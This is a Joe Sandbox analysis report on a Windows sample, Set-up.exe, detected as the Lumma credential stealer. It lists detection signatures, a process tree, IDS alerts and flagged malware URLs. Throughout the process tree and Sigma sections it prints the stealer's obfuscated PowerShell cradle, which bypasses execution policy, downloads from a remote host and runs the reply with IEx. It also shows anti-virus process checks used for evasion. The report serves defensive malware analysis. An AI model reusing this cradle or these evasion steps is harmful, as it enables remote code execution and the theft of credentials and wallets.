Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1582492
MD5:b92ee6aff573d5f6aec1cfd748fe3ccb
SHA1:203fd74f67e7013de56b3dc56e44d816437cc960
SHA256:ba34710ae9f0fe471ded943e84a8dbce2ad241fe550dc3e4e66a5062a978058c
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Set-up.exe (PID: 2164 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: B92EE6AFF573D5F6AEC1CFD748FE3CCB)
    • powershell.exe (PID: 3868 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 9ONHJ3I0NWFBK4Q0S62.exe (PID: 6448 cmdline: "C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
      • 9ONHJ3I0NWFBK4Q0S62.tmp (PID: 6208 cmdline: "C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$80070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
        • 9ONHJ3I0NWFBK4Q0S62.exe (PID: 5692 cmdline: "C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • 9ONHJ3I0NWFBK4Q0S62.tmp (PID: 6784 cmdline: "C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$90070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
            • timeout.exe (PID: 1096 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 3288 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6036 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 1248 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5788 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 4296 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5856 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5688 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5960 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 6252 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 6444 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5084 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 6324 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5436 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 3732 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3528 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 428 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 2452 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5808 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • BrightLib.exe (PID: 5860 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x4cc0b:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        00000000.00000003.2173757711.00000000007E5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2174167112.0000000000792000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 6 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell Download and Execution Cradles
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 2164, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, ProcessId: 3868, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 2164, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, ProcessId: 3868, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 2164, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, ProcessId: 3868, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 2164, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, ProcessId: 3868, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 2164, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, ProcessId: 3868, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 2164, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, ProcessId: 3868, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T18:13:09.982569+010020283713Unknown Traffic192.168.2.549704188.114.96.3443TCP
              2024-12-30T18:13:10.947979+010020283713Unknown Traffic192.168.2.549705188.114.96.3443TCP
              2024-12-30T18:13:12.094144+010020283713Unknown Traffic192.168.2.549706188.114.96.3443TCP
              2024-12-30T18:13:13.209295+010020283713Unknown Traffic192.168.2.549707188.114.96.3443TCP
              2024-12-30T18:13:14.463172+010020283713Unknown Traffic192.168.2.549708188.114.96.3443TCP
              2024-12-30T18:13:16.217302+010020283713Unknown Traffic192.168.2.549709188.114.96.3443TCP
              2024-12-30T18:13:17.263003+010020283713Unknown Traffic192.168.2.549712188.114.96.3443TCP
              2024-12-30T18:13:18.312302+010020283713Unknown Traffic192.168.2.549715188.114.96.3443TCP
              2024-12-30T18:13:19.512924+010020283713Unknown Traffic192.168.2.549718185.161.251.21443TCP
              2024-12-30T18:13:20.773091+010020283713Unknown Traffic192.168.2.549720104.21.37.128443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T18:13:10.457108+010020546531A Network Trojan was detected192.168.2.549704188.114.96.3443TCP
              2024-12-30T18:13:11.455753+010020546531A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
              2024-12-30T18:13:18.762335+010020546531A Network Trojan was detected192.168.2.549715188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T18:13:10.457108+010020498361A Network Trojan was detected192.168.2.549704188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T18:13:11.455753+010020498121A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T18:13:21.179793+010020084381A Network Trojan was detected104.21.37.128443192.168.2.549720TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T18:13:16.674403+010020480941Malware Command and Control Activity Detected192.168.2.549709188.114.96.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://klipvumisui.shop/LmAvira URL Cloud: Label: malware
              Source: https://cegu.shop:443/8574262446/ph.txtAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txttAvira URL Cloud: Label: malware
              Source: https://laborersquei.click/api.Avira URL Cloud: Label: malware
              Source: https://laborersquei.click/apiAvira URL Cloud: Label: malware
              Source: https://cegu.shop/TjAvira URL Cloud: Label: malware
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeReversingLabs: Detection: 39%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.7% probability
              Source: Set-up.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0040A326 __EH_prolog,FindFirstFileA,FindFirstFileW,FindFirstFileW,FindFirstFileW,0_2_0040A326
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0040A911 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,0_2_0040A911
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then lea eax, dword ptr [esp+3Ch]0_2_006A8078
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_006C004E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov eax, ebx0_2_006A6032
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov edx, ecx0_2_006C017E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [edi], al0_2_006AE14D
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [edi], al0_2_006AE14F
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, eax0_2_006AE2D9
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, eax0_2_006A429E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov edx, ecx0_2_006C046E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, ebx0_2_006A2507
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [edx+eax-088E69B8h]0_2_006A2507
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+24F32C00h]0_2_006A85AE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]0_2_006A060E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00696731
